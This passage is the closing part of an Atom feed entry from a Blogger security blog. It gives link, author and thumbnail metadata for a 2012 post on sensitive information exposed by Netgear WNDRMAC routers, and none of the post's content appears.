href="http://www.blogger.com/comment.g?blogID=9133539773684103848&amp;postID=3742260716775817219" title="1 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/9133539773684103848/posts/default/3742260716775817219" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/9133539773684103848/posts/default/3742260716775817219" /><link rel="alternate" type="text/html" href="http://www.hackplayers.com/2012/05/exposicion-de-info-sensible-en-routers.html" title="Exposicion de info sensible en routers Netgear WNDRMAC" /><author><name>Vicente Motos</name><uri>http://www.blogger.com/profile/03053036399006390105</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="24" height="32" src="http://4.bp.blogspot.com/-vOYTWqyujbI/TVRiEhZb0NI/AAAAAAAABTs/Dy1-E5Vl6W4/s220/CameraFun%2B-%2B2011-02-10%2B23.00.34.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/-efcWBG4aZZM/T7DLXmY5RbI/AAAAAAAAEnM/T5ZeZybqyaE/s72-c/netgear_WNDRMAC.png" height="72" width="72" /><thr:total>1</thr:total></entry></feed>

